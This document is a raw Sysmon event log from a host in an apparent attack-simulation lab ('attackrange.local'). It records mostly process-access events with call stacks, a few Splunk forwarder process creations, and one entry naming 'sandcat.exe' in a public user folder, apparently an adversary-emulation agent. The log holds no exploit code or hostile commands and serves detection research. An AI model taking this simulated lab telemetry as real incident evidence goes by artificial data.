13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4200-000000009101}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.164{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8552-5FCF-4200-000000009101}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.169{10ACEC4A-8552-5FCF-4200-000000009101}1920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.150{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.150{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.150{10ACEC4A-853E-5FCF-0A00-000000009101}8521140C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.150{10ACEC4A-8549-5FCF-2700-000000009101}2740C:\Users\Public\sandcat.exe 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8552-5FCF-3F00-000000009101}38163808C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4000-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4000-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.133{10ACEC4A-8552-5FCF-3E00-000000009101}38243820C:\Windows\system32\cmd.exe{10ACEC4A-8552-5FCF-4000-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.132{10ACEC4A-8552-5FCF-4000-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-8552-5FCF-3E00-000000009101}3824C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8552-5FCF-3F00-000000009101}38163808C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-3E00-000000009101}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-3F00-000000009101}3816C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.108{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 